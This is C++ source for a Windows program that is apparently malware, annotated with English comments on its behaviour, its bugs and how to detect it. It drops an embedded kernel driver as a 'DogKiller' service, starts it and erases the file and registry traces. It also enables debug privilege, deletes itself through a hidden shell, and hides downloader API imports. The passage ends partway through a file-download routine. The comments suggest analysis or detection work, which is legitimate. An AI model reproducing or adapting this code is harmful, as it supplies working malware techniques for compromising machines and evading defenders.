// Dat.cpp : Defines the entry point for the application.
//
#include "stdafx.h"
#include "resource.h"
#include <Windows.h>
#include <WinIoCtl.h>
#include <tchar.h>
#include <shlwapi.h>
#include "stdlib.h"
#include "stdio.h"
// 下载者所需
#include "iphlpapi.h"
#include <urlmon.h>
#include <Tlhelp32.h>
#include <Wininet.h>
#pragma comment(lib,"Wininet.lib")
#pragma comment(lib,"shlwapi.lib")
#pragma comment(linker,"/ALIGN:0x1000")
// Custom device-control codes (function numbers 0x06 and 0x07, METHOD_BUFFERED).
// Neither is referenced in the visible part of this file.
#define IOCTL_PASS_SNDISK (DWORD)CTL_CODE(FILE_DEVICE_UNKNOWN, 0x06, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define IOCTL_INJECT_FILE (DWORD)CTL_CODE(FILE_DEVICE_UNKNOWN, 0x07, METHOD_BUFFERED, FILE_ANY_ACCESS)
// Service name used for the kernel driver installed by InstallDriver()/xxxx().
// It also appears as the registry key HKLM\SYSTEM\CurrentControlSet\Services\DogKiller,
// which makes it a usable detection artifact.
#define SERVICE_NAME _T("DogKiller")
// Used by the downloader: function-pointer types for urlmon / wininet routines
// that are resolved at run time with GetProcAddress instead of being imported
// statically (keeps them out of the import table).
typedef HRESULT (_stdcall *XXXURLDownloadToFile)(LPUNKNOWN,LPCSTR,LPCSTR,DWORD,LPBINDSTATUSCALLBACK);
typedef HINTERNET (_stdcall *XXXInternetOpen)(LPCTSTR, DWORD, LPCTSTR, LPCTSTR, DWORD);
typedef HINTERNET (_stdcall *XXXInternetOpenUrl)(HINTERNET, LPCTSTR, LPCTSTR, DWORD, DWORD, DWORD);
typedef BOOL (_stdcall *XXXInternetCloseHandle)(HINTERNET);
// Driver-loading support: a local copy of the native UNICODE_STRING layout and a
// pointer type for the undocumented ntdll routine ZwLoadDriver, which LoadDriver()
// resolves at run time and stores in the global below.
typedef struct _LSA_UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PVOID Buffer;
} LSA_UNICODE_STRING, *PLSA_UNICODE_STRING;
typedef LSA_UNICODE_STRING UNICODE_STRING, *PUNICODE_STRING;
typedef DWORD (CALLBACK* ZWLOADDRIVER)(PVOID);
ZWLOADDRIVER ZwLoadDriver;
// Enables SeDebugPrivilege on the current process token.
// Every failure is silent: the function returns void and the result of
// AdjustTokenPrivileges (stored in bREt) is never examined, so callers cannot
// tell whether the privilege was actually granted. Token privilege adjustment
// of this kind is logged by Windows security auditing when enabled.
void RaiseToDebugP()
{
HANDLE hToken;
HANDLE hProcess = GetCurrentProcess();
// TOKEN_QUERY is needed alongside TOKEN_ADJUST_PRIVILEGES for the adjust call.
if ( OpenProcessToken(hProcess, TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken) )
{
TOKEN_PRIVILEGES tkp;
if ( LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tkp.Privileges[0].Luid) )
{
tkp.PrivilegeCount = 1;
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
// Return value (and ERROR_NOT_ALL_ASSIGNED from GetLastError) is ignored.
BOOL bREt = AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, NULL, 0) ;
}
CloseHandle(hToken);
}
}
// Writes the embedded resource IDR_SYS (custom resource type "BIN") to lpszSysPath.
// The resource is the payload that xxxx() later registers as a kernel driver.
// Returns TRUE only when the resource was found, locked and WriteFile succeeded;
// FALSE otherwise. CREATE_NEW makes the call fail if the target already exists.
BOOL ReleaseSysFile( LPCTSTR lpszSysPath )
{
HGLOBAL hGol;
HRSRC hSrc;
BOOL bRet = FALSE;
hSrc = ::FindResource( NULL, MAKEINTRESOURCE(IDR_SYS), _T("BIN"));
if (hSrc == NULL)
return FALSE;
hGol = ::LoadResource( NULL, hSrc);
if ( hGol == NULL)
return FALSE;
PVOID lpData;
DWORD dwSize;
lpData = ::LockResource( hGol);
if (lpData == NULL )
return FALSE;
dwSize = ::SizeofResource( NULL, hSrc);
HANDLE hFile;
hFile = CreateFile( lpszSysPath, GENERIC_WRITE, 0, NULL, CREATE_NEW, FILE_ATTRIBUTE_NORMAL, NULL);
if ( hFile == INVALID_HANDLE_VALUE )
return FALSE;
// dwSize doubles as the bytes-written out-parameter, so the requested size is
// no longer available afterwards to detect a short write.
bRet = WriteFile( hFile, lpData, dwSize, &dwSize, NULL);
CloseHandle( hFile );
return bRet;
}
// Opens the service pszServiceName with SERVICE_ALL_ACCESS.
// Returns the service handle, or NULL if the SCM or the service could not be opened.
// Handle ownership: when pScManager is non-NULL the SCM handle is handed to the
// caller (even if it is NULL or the service open failed) and the caller must close
// it; when pScManager is NULL the SCM handle is closed here before returning.
SC_HANDLE GetServiceByName(IN LPCTSTR pszServiceName, OUT OPTIONAL SC_HANDLE* pScManager)
{
SC_HANDLE hScManager, hScService;
hScService = NULL;
// SC_MANAGER_ALL_ACCESS requires administrative rights.
hScManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
if ( pScManager != NULL )
*pScManager = hScManager;
if ( hScManager != NULL )
{
hScService = OpenService(hScManager, pszServiceName, SERVICE_ALL_ACCESS);
if ( pScManager == NULL )
CloseServiceHandle(hScManager);
}
return hScService;
}
// Returns an open handle to the service pszServiceName, creating it as a
// demand-start kernel-driver service (SERVICE_KERNEL_DRIVER) whose image is
// pszDriverFile when it does not already exist and the file is present on disk.
// Returns NULL if the SCM could not be opened, the file is missing, or
// CreateService failed. The SCM handle obtained through GetServiceByName is
// always closed here. Service creation of this type is recorded by the SCM
// (System event log 7045) and is a good detection hook.
SC_HANDLE InstallDriver(IN LPCTSTR pszServiceName, IN LPCTSTR pszDriverFile)
{
SC_HANDLE hScManager, hScService;
hScManager = NULL;
hScService = GetServiceByName(pszServiceName, &hScManager);
if (
hScService == NULL &&
hScManager != NULL &&
// -1 is INVALID_FILE_ATTRIBUTES: only create the service if the file exists.
GetFileAttributes(pszDriverFile) != -1/*INVALID_FILE_ATTRIBUTES*/
)
{
hScService = CreateService(hScManager, pszServiceName, pszServiceName, SERVICE_ALL_ACCESS,
SERVICE_KERNEL_DRIVER, SERVICE_DEMAND_START, SERVICE_ERROR_NORMAL, pszDriverFile, NULL,
NULL, NULL, NULL, NULL
);
}
if ( hScManager != NULL )
CloseServiceHandle(hScManager);
return hScService;
}
//
// 驱动加载
//
// Widens a NUL-terminated single-byte string into pUnicode by copying each input
// byte into the first byte of the corresponding wchar_t (the other byte is left
// zero by the memset). buflen is the destination size in BYTES and must hold
// (len+1)*2. Returns FALSE when the buffer is too small or pUnicode is NULL.
// NOTE(review): this is a byte-widening, not a code-page conversion — it is only
// correct for 7-bit ASCII input and relies on little-endian wchar_t layout;
// bytes >= 0x80 produce unrelated code units.
BOOL MC_AnsiToUnicode(const char *pAnsi,wchar_t *pUnicode,size_t buflen)
{
size_t len=strlen(pAnsi);
if((buflen<(len+1)*2)||(pUnicode==NULL))
{
return FALSE;
}
memset(pUnicode,0,(len+1)*2);
for(UINT i=0;i<len;i++)
{
memcpy(pUnicode+i,pAnsi+i,1);
}
// Redundant: the memset above already zeroed the terminator.
memcpy(pUnicode+len,"\0",1);
return TRUE;
}
// Loads a kernel driver without the SCM by writing a minimal service key
// (Type=1, ErrorControl=1, Start=3) under
// HKLM\System\CurrentControlSet\Services\<szDrvName> and then calling the
// undocumented ntdll routine ZwLoadDriver with the NT registry path of that key.
// This function is not called from the visible part of the file (the call in
// xxxx() is commented out). Observations: the GetProcAddress result is not
// NULL-checked before the call; the ImagePath writes are commented out; the
// return value of ZwLoadDriver is ignored and the function always returns TRUE
// once the key was created; hNtdll is never freed. Registry writes of this shape
// plus a ZwLoadDriver call from user mode are a strong detection signal.
BOOL LoadDriver(char * szDrvName, char * szDrvPath)
{
HMODULE hNtdll = NULL;
hNtdll = LoadLibrary( "ntdll.dll" );
if ( !hNtdll )
{
return FALSE;
}
// Stored in the file-scope global ZwLoadDriver; may be NULL (not checked below).
ZwLoadDriver = (ZWLOADDRIVER)
GetProcAddress( hNtdll, "ZwLoadDriver");
LSA_UNICODE_STRING buf2;
char szSubKey[200], szDrvFullPath[256],szName[256]={0};
int iBuffLen;
HKEY hkResult;
char Data[4];
DWORD dwOK;
// Unbounded sprintf into fixed buffers; szDrvName / szDrvPath length is not validated.
iBuffLen = sprintf(szSubKey,"System\\CurrentControlSet\\Services\\%s",szDrvName);
szSubKey[iBuffLen]=0;
// szName is assigned but never read (leftover from the commented-out AddStringToReg calls).
strcpy(szName,"HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services");
dwOK = RegCreateKey(HKEY_LOCAL_MACHINE,szSubKey,&hkResult);
if(dwOK!=ERROR_SUCCESS)
return FALSE;
// Little-endian DWORD 1: Type = SERVICE_KERNEL_DRIVER, ErrorControl = 1 (normal).
Data[0]=1;
Data[1]=0;
Data[2]=0;
Data[3]=0;
// The literal 4 passed as dwType is REG_DWORD; RegSetValueEx results are not checked.
dwOK=RegSetValueEx(hkResult,"Type",0,4,(const unsigned char *)Data,4);
dwOK=RegSetValueEx(hkResult,"ErrorControl",0,4,(const unsigned char *)Data,4);
char StartData[4];
// Little-endian DWORD 3: Start = SERVICE_DEMAND_START.
StartData[0]=3;
StartData[1]=0;
StartData[2]=0;
StartData[3]=0;
dwOK=RegSetValueEx(hkResult,"Start",0,4,(const unsigned char *)StartData,4);
RegCloseKey(hkResult);
// NT-style path "\??\<szDrvPath>"; converted to wPath but wPath is unused because
// the ImagePath writes below are commented out.
iBuffLen = sprintf(szDrvFullPath,"\\??\\%s",szDrvPath);
szDrvFullPath[iBuffLen]=0;
wchar_t wPath[MAX_PATH+1]={0};
MC_AnsiToUnicode(szDrvFullPath,wPath,MAX_PATH*2);
//AddStringToReg(szName,szDrvName,"ImagePath",wPath,2*(wcslen(wPath)+1),REG_SZ);
//AddStringToReg(szSubKey,"","ImagePath",wPath,2*(wcslen(wPath)+1),REG_SZ);
// Registry path in native (\Registry\Machine\...) form, as ZwLoadDriver expects.
iBuffLen = sprintf(szSubKey,"\\Registry\\Machine\\System\\CurrentControlSet\\Services\\%s",szDrvName);
wchar_t wLoad[MAX_PATH+1]={0};
szSubKey[iBuffLen]=0;
MC_AnsiToUnicode(szSubKey,wLoad,MAX_PATH*2);
// Length is in bytes (2 per character); MaximumLength is left uninitialized.
buf2.Buffer = (PVOID)wLoad;
buf2.Length = iBuffLen*2;
// NTSTATUS result discarded.
ZwLoadDriver(&buf2);
return TRUE;
}
// Drops the embedded driver to szSysPath, registers it as the SERVICE_NAME
// kernel-driver service, starts it if it is not already running, and then removes
// both the file and the service's registry key. The driver presumably stays
// loaded after this cleanup while its on-disk artifacts are gone, so detection
// should key on the transient service creation / start events rather than on
// the file. Return values of ReleaseSysFile and StartService (bResult) are not
// acted on. The commented-out block is an earlier variant that used LoadDriver()
// with a fixed disks.sys path. The trailing ';' after the closing brace is a stray
// empty declaration.
void xxxx(LPCTSTR szSysPath)
{
BOOL bResult;
ReleaseSysFile(szSysPath);
/* CHAR ac_driverLabel[] = "PCIbusDevice00";
DWORD dwResult ;
TCHAR pSys[MAX_PATH+1]={0};
dwResult = ExpandEnvironmentStrings(
TEXT("%SystemRoot%\\System32\\drivers"),
pSys,
MAX_PATH);
if(dwResult==0)
{
return;
}
_tcscat(pSys,TEXT("\\disks.sys"));
LoadDriver(SERVICE_NAME,(char *)szSysPath);*/
SC_HANDLE hScHandle = InstallDriver( SERVICE_NAME, szSysPath );
if ( hScHandle != NULL )
{
SERVICE_STATUS Status;
// Start only when the status query fails or the service is not already running.
if (
!QueryServiceStatus(hScHandle, &Status) ||
Status.dwCurrentState != SERVICE_RUNNING
)
{
bResult = StartService(hScHandle, 0, NULL);
}
else
{
bResult = TRUE;
}
CloseServiceHandle(hScHandle);
}
// Anti-forensic cleanup: remove the dropped file and the whole service key.
DeleteFile( szSysPath );
SHDeleteKey( HKEY_LOCAL_MACHINE, _T("SYSTEM\\CurrentControlSet\\Services\\") SERVICE_NAME );
};
//
// 映射文件,返回映射后的地址,并保存文件的大小
//
// Maps the whole file lpFilePath into memory and returns the view base address,
// or NULL if the file could not be opened, mapped, or viewed.
// bReadOnly selects GENERIC_READ / PAGE_READONLY / FILE_MAP_READ; otherwise the
// file is opened read-write and the view is writable (changes go back to the file).
// If lpdwFileSize is non-NULL it receives the low 32 bits of the file size
// (GetFileSize with a NULL high part), and only once the file has been opened.
// The file and mapping handles are closed before returning; the view itself keeps
// the mapping alive until UnmapFile()/UnmapViewOfFile is called.
LPVOID MapFile(LPCTSTR lpFilePath, LPDWORD lpdwFileSize, BOOL bReadOnly)
{
// [0] = desired access for CreateFile, [1] = page protection, [2] = view access.
DWORD dwAccess[3];
if ( bReadOnly )
{
dwAccess[0] = GENERIC_READ;
dwAccess[1] = PAGE_READONLY;
dwAccess[2] = FILE_MAP_READ;
}
else
{
dwAccess[0] = (GENERIC_WRITE | GENERIC_READ);
dwAccess[1] = PAGE_READWRITE;
dwAccess[2] = (FILE_MAP_READ | FILE_MAP_WRITE);
}
HANDLE hFile = CreateFile(lpFilePath, dwAccess[0], FILE_SHARE_READ,
NULL, OPEN_EXISTING, 0, NULL);
if ( hFile != INVALID_HANDLE_VALUE )
{
if ( lpdwFileSize != NULL )
{
*lpdwFileSize = GetFileSize(hFile, NULL);
}
// Size 0/0 maps the entire file.
HANDLE hFileMap = CreateFileMapping(hFile, NULL, dwAccess[1], 0, 0, NULL);
CloseHandle(hFile);
if ( hFileMap != NULL )
{
LPVOID lpFileData = MapViewOfFile(hFileMap, dwAccess[2], 0, 0, 0);
CloseHandle(hFileMap);
return lpFileData;
}
}
return NULL;
}
// Releases a view obtained from MapFile(). NULL is accepted and ignored.
// The UnmapViewOfFile result is not checked.
void UnmapFile(LPVOID lpFileData)
{
if ( lpFileData != NULL )
{
UnmapViewOfFile(lpFileData);
}
}
//
// 获取文件尾在内存中的地址
//
// Locates the overlay (data appended after the last section) of a PE image that
// has been loaded into memory at lpBuffer as a flat file of dwSize bytes.
// Returns the address where the overlay begins, or NULL if the MZ / PE signatures
// do not match. If poutSize is non-NULL it receives dwSize minus the offset of
// the overlay, i.e. the overlay length (this can underflow if the last section
// ends beyond dwSize). Only the signatures are validated: e_lfanew and the
// section-header walk are not bounds-checked against dwSize, so a truncated or
// crafted input can cause out-of-bounds reads. The (DWORD) pointer casts assume a
// 32-bit build. The result assumes the last section header also has the highest
// raw file offset — presumably true for the images this is used on.
LPVOID GetOverlayOffset(PVOID lpBuffer, DWORD dwSize, LPDWORD poutSize)
{
PIMAGE_DOS_HEADER DosHeader;
PIMAGE_NT_HEADERS NtHeader;
PIMAGE_SECTION_HEADER SectHeader;
DosHeader = (PIMAGE_DOS_HEADER)lpBuffer;
if ( DosHeader->e_magic != IMAGE_DOS_SIGNATURE )
return NULL;
NtHeader = (PIMAGE_NT_HEADERS)( DosHeader->e_lfanew + (DWORD)DosHeader );
if ( NtHeader->Signature != IMAGE_NT_SIGNATURE )
return NULL;
// Holds an absolute address, stored as a DWORD (32-bit only).
DWORD overlay = NULL;
// Start at the first section header, then advance to the LAST one.
SectHeader = IMAGE_FIRST_SECTION(NtHeader);
SectHeader += (NtHeader->FileHeader.NumberOfSections-1);
// End of the last section's raw data, as an absolute address in the buffer.
overlay = SectHeader->PointerToRawData + SectHeader->SizeOfRawData + (DWORD)lpBuffer;
if ( poutSize != NULL )
{
// Number of bytes that follow the PE image proper (the overlay size).
*poutSize = dwSize - (overlay -(DWORD)lpBuffer);
}
return (PVOID)overlay;
}
//
// PVOID GetOverlayInfo( LPCTSTR lpFileName, LPDWORD dwSize, LPDWORD dwUrlOffset )
// {
// // 把overlay读入内存
// DWORD dwFileSize;
// LPVOID lpBuffer;
// PVOID pVersion = NULL;
// PVOID pUrlAddress = NULL;
// DWORD dwVersionSize;
//
// lpBuffer = MapFile( lpFileName, &dwFileSize, TRUE);
// if ( lpBuffer == NULL )
// return NULL;
//
// /* struct {
// DWORD dwVirusSize;
// BYTE VirusData[1];
// };
// */
// pVersion = GetOverlayOffset( lpBuffer, dwFileSize, &dwVersionSize);
// if ( pVersion != NULL )
// {
// OutputDebugString("xxx");
//
// DWORD urlSize;
// pUrlAddress = GetOverlayOffset( pVersion, dwVersionSize, &urlSize);
// if ( pUrlAddress != NULL)
// {
// OutputDebugString("xxx2");
//
// if ( dwSize != NULL )
// *dwSize = urlSize;
//
// if ( dwUrlOffset != NULL )
// *dwUrlOffset = (dwVersionSize-urlSize);
// }
// else
// pVersion = NULL;
// }
//
// UnmapFile(lpBuffer);
//
// return pUrlAddress;
// }
// Self-deletion: spawns "<COMSPEC> /c del <short path of this exe>" as a hidden,
// suspended, idle-priority process, raises this process to HIGH_PRIORITY_CLASS,
// clears the executable's file attributes, then resumes the shell. Returns 0 on
// launch, otherwise the GetLastError() value from CreateProcess. The caller is
// expected to exit shortly afterwards — presumably the `del` fails while the
// image is still in use. Return values of GetModuleFileName /
// GetEnvironmentVariable / GetShortPathName are unchecked and the
// PROCESS_INFORMATION handles are never closed. The "cmd /c del <self>" command
// line is a common self-delete pattern and is easy to flag in process-creation
// telemetry.
int WINAPI K32DeleteSelfFile()
{
TCHAR tcsExename[MAX_PATH];
TCHAR tcsParam[MAX_PATH * 2];
TCHAR tcsCmd[MAX_PATH];
HANDLE hProcess = NULL;
// get exe filename and command shell program
GetModuleFileName(NULL, tcsExename, MAX_PATH);
GetEnvironmentVariable(_T("COMSPEC"), tcsCmd, MAX_PATH);
// get short filename for command shell program (in-place: same buffer for in and out)
GetShortPathName(tcsExename, tcsExename, MAX_PATH);
// create a command process, set its priority, then start it.
STARTUPINFO si;
PROCESS_INFORMATION pi;
ZeroMemory( &si, sizeof(si) );
si.cb = sizeof(si);
si.dwFlags = STARTF_USESHOWWINDOW;
si.wShowWindow = SW_HIDE;
ZeroMemory( &pi, sizeof(pi) );
// Unbounded formatting; relies on tcsParam being twice MAX_PATH.
_stprintf(tcsParam, _T("%s /c del %s"), tcsCmd, tcsExename);
// Created suspended so priorities can be adjusted before it runs.
if(!CreateProcess(NULL,
tcsParam,
NULL,
NULL,
FALSE,
CREATE_SUSPENDED,
NULL,
NULL,
&si,
&pi))
{
return GetLastError();
}
// heigthen priority of the current process
SetPriorityClass(GetCurrentProcess(), HIGH_PRIORITY_CLASS);
// set file attribute to normal
SetFileAttributes(tcsExename, FILE_ATTRIBUTE_NORMAL);
// depress priority of command process, then start it
SetPriorityClass(pi.hProcess, IDLE_PRIORITY_CLASS);
ResumeThread(pi.hThread);
return 0;
}
//
// 运行程序
//
// Launches szFileName through WinExec, visible (SW_SHOW) when bShow is TRUE and
// hidden (SW_HIDE) otherwise. The STARTUPINFO / PROCESS_INFORMATION locals are
// leftovers from a CreateProcess variant (see the commented lines) and are unused.
// bRet is never updated, so the function always returns FALSE regardless of
// whether WinExec succeeded. WinExec takes an ANSI string; passing an LPCTSTR
// here implies an ANSI (non-UNICODE) build.
BOOL RunProcess(LPCTSTR szFileName, BOOL bShow)
{
STARTUPINFO si = {0};
PROCESS_INFORMATION pi = {0};
BOOL bRet = FALSE;
si.cb = sizeof(si);
if ( bShow )
{
// si.wShowWindow = SW_SHOW;
// si.dwFlags |= STARTF_USESHOWWINDOW;
WinExec( szFileName, SW_SHOW);
}
else
WinExec( szFileName, SW_HIDE);
// Always FALSE: WinExec's result is discarded.
return bRet;
}
void DownloadFile(LPCTSTR lpszUrl, int iProcessNameNumber)
{
BOOL bIsIni = FALSE;
LPTSTR lpPostFix = strrchr(lpszUrl, '.');
if ( lpPostFix == NULL )
return;
lpPostFix++;
XXXURLDownloadToFile kkkkkk;
HRESULT hRes ;
TCHAR szTempDir[MAX_PATH];
TCHAR szTempExe[MAX_PATH];
kkkkkk = (XXXURLDownloadToFile)GetProcAddress( LoadLibrary("urlmon.dll"), "URLDownloadToFileA");
if ( kkkkkk == NULL )
return;
if ( stricmp(lpPostFix, "ini") == 0 || stricmp(lpPostFix, "txt") == 0 )
{
bIsIni = TRUE;
}
if (bIsIni)
{
// 是配置文件,则下载保存为down.txt
GetSystemDirectory(szTempDir, MAX_PATH);
strcat(szTempDir, "\\down.txt");
strcpy(szTempExe, szTempDir);
// 循环300次
for ( DWORD index = 0; index < 10; index++)
{
hRes = kkkkkk( NULL, lpszUrl, szTempExe, 0, NULL);
if ( hRes == S_OK )
{
break;
}
Sleep(1000);
}
if ( index == 10 )
{
return;